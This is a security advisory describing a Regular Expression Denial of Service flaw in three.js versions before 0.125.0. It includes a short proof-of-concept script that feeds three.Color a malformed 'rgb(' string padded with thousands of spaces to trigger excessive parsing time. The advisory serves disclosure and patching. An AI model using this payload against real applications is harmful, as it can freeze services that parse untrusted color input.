NODEJS:1639

Regular Expression Denial of Service

2021-03-01 20:02:32
Anonymous
www.npmjs.com

EPSS: 0.003 (Low)
EPSS Percentile: 70.5%

Overview

The three package (three.js) before version 0.125.0 is vulnerable to Regular Expression Denial of Service (ReDoS). The issue is triggered when three.Color parses rgb or hsl color strings.

POC

var three = require('three');

// Builds "rgb(" followed by n spaces and no closing ")": the malformed
// input that makes the vulnerable color-string parser backtrack excessively.
function build_blank(n) {
  var ret = "rgb(";
  for (var i = 0; i < n; i++) {
    ret += " ";
  }

  return ret;
}

var Color = three.Color;

// Time how long the vulnerable version takes to parse the padded string;
// on an affected release this grows far beyond linear in n.
var time = Date.now();
new Color(build_blank(50000));
var time_cost = Date.now() - time;
console.log(time_cost + " ms");

Recommendation

Upgrade to version 0.125.0 or later

References

CPE Name   Operator   Version
three      lt         0.125.0
